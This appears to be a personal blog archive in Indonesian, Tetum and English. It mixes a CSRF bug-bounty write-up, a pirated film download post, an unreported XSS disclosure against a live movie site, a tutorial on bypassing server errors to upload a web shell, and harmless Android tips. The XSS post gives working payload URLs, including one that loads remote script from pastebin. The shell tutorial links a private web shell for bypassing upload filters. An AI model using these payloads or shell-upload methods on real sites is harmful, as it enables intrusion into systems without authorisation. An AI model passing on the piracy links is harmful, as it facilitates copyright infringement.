Sunday, April 5, 2020

Jamtangan.com Bug Bounty — CSRF On Editing Name

Journey Of My First Bug Bounty.

Halo semuanya perkenalkan nama saya Roberto Nunes Saya Dari TIMOR-LESTE ini adalah WriteUp pertama saya di medium.com, sebelumnya saya ingin meminta maaf jika ada kekurangan apapun pada artikel ini.

Kali ini yang saya bahas adalah bagaimana saya menemukan bug CSRF pada website Jamtangan.com.

Jamtangan.com adalah situs jual jam tangan online, ohh yahh Cerita sedikit hari itu pada tanggal 24 Maret, saya melihat Teman saya Zaenal post story di WA bawah situs jamtangan.com Open Bug Bounty Program. Selepas itu niat saya ingin langsung test web tersebut.



Catatan: Jika sudah tau apa itu CSRF lewati “Apa itu CSRF?”

Apa itu CSRF?

CSRF(Cross Site Request Forgery) adalah salah satu jenis serangan yang memaksa pengguna untuk melakukan tindakan yang tidak diinginkan pengguna pada aplikasi web saat pengguna sedang log in.Contohnya seperti ini misalnya ada suatu website yang memiliki fitur yang dapat mentransfer uang ke rekening seseorang,karena tidak ada proteksi seperti csrf token, penyerang memanfaatkan fitur tersebut dengan memberikan link ke korban yang berisi kode html dimana saat linknya diklik akan mengirim uang ke rekening penyerang asalkan korban dalam keadaan login di website tersebut.Untuk detailnya bisa baca disini,

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Setelah otak atik saya temukan CSRF pada edit nama, disitu tidak ada token user-specific rahasia yang ditambahkan ke cookie.


Setelah itu mamanq, saya langsung submit laporan ke pihak dev, singkat cerita keesokan harinya tepat 24 jam, saya mencoba hubungi kembali CS via Chat Box
.



Duhh awto senang Mamanq… Setelah itu gk nyampe 1 jam saya Langsung dihubungi pihak DEV, dan ngasih Reward.

kalian bisa test langsung Web nya gansis, ini linknya.

https://bantuan.jamtangan.com/hc/id/articles/360026084611-Pelaporan-Bug-Bounty

Untuk video POC nya kalian bisa nonton di channel saya https://youtu.be/1qpB6FtbiUY


Timeline :


25 maret 2020 (11:35): Report Bug

26 maret 2020 (11:53) : Reward Diterima

Tuesday, February 25, 2020

Download Film MILEA Suara Dari Dilan Full Movie


Download MILEA SUARA DARI DILAN


MILEA SUARA DARI DILAN

Tidak ada kisah yang lebih Indah dari kisah cinta di SMA.Sama halnya dengan kisah cinta Dilan dan Milea.Dari yang awalnya benci hingga saling mencintai. Dari yang awalnya manis hingga menjadi rumit.Menjelang reuni akbar,Dilan memutuskan untuk menceritakan kembali masa masa itu.Mulai dari kali pertama mereka bertemu,menjalin kasih,hingga berjuang untuk bertahan.Masa yang tidak selalu indah,namun terus membekas dibenaknya.Ini adalah cara Dilan mengingat Milea.Ini adalah cara Dilan mengingat sebuah cinta yang ia pikir akan bertahan selamanya.

PRODUSER:
Ody Mulya Hidayat

DIRECTOR:
Fajar Bustomi,Pidi Baiq

WRITTER:
Pidi Baiq,Titien Wattimena

CAST:
Iqbaal Ramadhan,Vanesha Prescilla,Adhisty Zara,Yoriko Angeline,Zulfa Maharani,Debo Andryos,Andovi da Lopez,Jerome Kurnia,Gusti Rayhan,Omara Esteghlal,Gulio Parengkuan.




LINK DOWNLOAD:
PS : Film ini Hanya berdurasi 1 jam 36 Menit Plus ini Hanya Bajakan

Via Drivefire
Via DropBox
Via Pastelink

Saturday, January 4, 2020

Grifus WordPress Themes XSS Vuln [Gudangmovies21]

Hello
Friend, good afternoon everyone, this time I share a little more bugs that I found on one of the movie download sites which is quite large, GUDANGMOVIES21.

Title: Grifus WordPress  Themes  XSS Vuln
Affected Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
============


Why don't you just report it ? The point is I'm lazy to report bugs like this, the ending is just underestimated by them, right they say XSS is just a trivial thing hihi, so it's just lazy. Better Just WriteUP and to share experiences.

Here are the payloads that I use:
<script>prompt(document.domain)</script>

For the URL Vulnerability & Parameters you can open / see below:
https://gudangmovies21.today/?s=<script>prompt(document.domain)</script>

Alright, maybe that's all for today, thank you ...
That's all from me, Happy Bug Hunting and thanks for coming here.

Not only that, I also tried to use the html script in XSS this time and it worked. Here is the payload :
https://gudangmovies21.today/?s=<script src=https://pastebin.com/raw/VX2Sig1t/></script>


Friday, November 1, 2019

Lalaok Bypass Error 403, 404, 406 Precondition Wainhira Upload Shell

Lalaok Bypass Error 403, 404, 406 Precondition Wainhira Upload Shell


Hallo Guys : * Kleur La upload tutorial :V ( Admin Sofre ),wkwkwk.
ok Langsung iha biban ne hau sei fahe tutorial Lalaok Bypass Error 403, 404, 406 Precondition Wainhira Upload Shell, haw sei fo hatene oinsa atu Bypass i metodo ne fasil tebes.

BTW iha tutorial ida ne ita so uza shell Private/Priv8 ne Khusus atu bypass, depois de bypass imi bele upload imi nia shell Favorito.

Ohh yah Dala ida tan se wainhira imi Upload Shell Private ne maibe mosu Error nafatin Atau redirect no mosu Blank Page, Diak Liu Mas Bro sira Husik Tia Deit Tamba ne Laos imi nia rezeki. hehehhehe

Shell DownLoad : https://pastebin.com/tizUkMj9

Ohh yah Dala ida tan se wainhira imi Upload Shell Private ne maibe mosu Error nafatin Atau redirect no mosu Blank Page, Diak Liu Mas Bro sira Husik Tia Deit Tamba ne Laos imi nia rezeki. hehehhehe

Video TutoriaL

Thursday, August 15, 2019

Solusaun Problema Force Close Aplikasaun/Game iha Android

Solusaun Problema force close aplikasaun/Game iha Android 




Senti Kontenti wainhira halimar Game iha Android Sa tan Game nebe halimar Grafiku nebe kapas ka HD.

Maibe se karik akontese halimar dadauk Game hakfodak Game ne'e Na'in Close ka ( keluar Sendiri ) La ho Haruka husi ita. Kondisau ida hanesan ne'e mak halo ita estres no bele tuda rahun tan ita nia Gadget, maibe quandu akontese dala ida ka dala rua ne'e la iha problema, maibe sempre akontese ne pior liu tan, quandu akontese hanesan ne'e iha ita nia hanoin katak dalaruma ita nia smarthpone mak at.
Haha maibe iha tips balun mak sei atende problema hira ne'e , Hanesan hau mos senti wainhira halimar hela game iha Android Telemor nian T8401, hakfodak nain force close padahal la haruka husi user.
Depois de hau searching iha google hau nian problema Ne'e bele atende katak Fator primeriu mak RAM.

1. Taka aplikasaun nebe mak la uza

iha kazu aplikasaun nebe mak force close identik ona
Beben Ram nebe Todan, nebe mak halo lambat system, ho ida ne'e system android tenki halo asaun force close.Ho solusaun ida ita bele habadak katak wainhira atu halao( menjalankan ) aplikasaun nebe kapasitas bot ka grafiku nebe kroat ita tenki force close tiha aplikasaun balun nebe lao hela iya background android nebe konsumu Ram, iha app balun bele automatic close app maibe bele mos uza meiu manual ba iha setting>app>running klik no force close.
Bele moz uninstal( copot ) aplikasaun nebe sente katak la presiza, aplikasaun sira hanesan ne'e mak konsumu Ram barak liu.

2. Download aplikasaun tuir forca ita bot nia smartphone

problema tuir mai nebe mak bai bain akontese mak Download game ka aplikasaun nebe prepara ona iha play store maibe download fali iha sitio nebe prepara apk nebe la kompetivel ho ita nia smarthphone.
Problema ida ne'e ita tenki download game ka aplikasaun nebe prepara ona iha play store nebe khusus ho forca smartphone nebe ita iha.
Tamba dalaruma Aplikasaun nebe ho kapasidade bot bele halo demora ita nia smarthpone liu liu ba kulaidade RAM nebe ki'ik ne'e pior liu tan.

3. Clear cache

Chache iha Android mak hanesan file sampa ( restu ) tau hamutuk wainhira ita halao aplikasaun, transfer file, browsing internet. Problema hirak ne'e mos fo impaktu la diak ba smarthphone liu liu ba kinerja RAM Android. Ho nia solusaun ba problema ida ne'e ita bot bele rutin hamos cache bele uza aplikasun no mos bele uza meiu MAnual deit settings>app>(klik aplikasaun nebe deit)no scrol ba kraik no >Clear Cache.

4. Modu airplane

Wainhira atu halao ka running aplikasaun nebe Hd (high definition) hamate tiha jaringan seluler ka airplane mode no mos taka WI-FI, BLUETOOTH no GPS quandu la uza, notifikasaun hasne mak sei halo smartphone demora.

5. Restart Android

No Tips tuir mai mak Restart system Android,wainhira Restart ona system Android sei fresh no original husi Fabrika no Aplikasaun sei clear hotu nia data.wainhira senti Android iha falhansu iha system entaun dalan diak liu mak Restart,  maibe keta haluha Back up uluk ita bot nia data penting. 

Lalaok Atu instal Game Apk+Data iha Android

Oinsa atu instal game Apk+data iha Android




Diak,  Nafatin iha Android Tutorial Ba Belun sira nebe mak konfusaun oinsabl atu instalasaun game android nebe ho data(cache).
Tamba  game nebe ho data iha android Maioria ho grafiku nebe mak diak ka HD ( high definition ) Entaun oinsa atu hetan Game nebe ho data, hau Sugest ba ita bot katak. sitio ka Situs nebe mak download game ho data ita bot bele browsing iha www.Revdl.com no www.play.mob.org


Sitio rua ne'e prepara ona Mil i tall ba game android ho data no mos full game, laos sitio rua ne'e deit maibe mos ita bot sira bele browsing iha Google ba game nebe ho data.Oinsa mak atu instal game+data iha Android tuir mai nia tutorial 

MATERIAL
Android
Zarchiver
Game nebe ho data

1) instal Zarchiver hanesan baibain
No open Zarchiver


2) Buka file Game+data iha folder nebe  save

3) klik iha data game, hanesan iha figura Leten hau uza Shadow fight 2


4) klik extract, No save iha folder Android/obb


Save iha folder Android/Obb

5) klik iha seta liman karuk nian no hein file compresed

Depois de Extract hotu,  instal Nia Apk hanesan baibain no enjoy Game.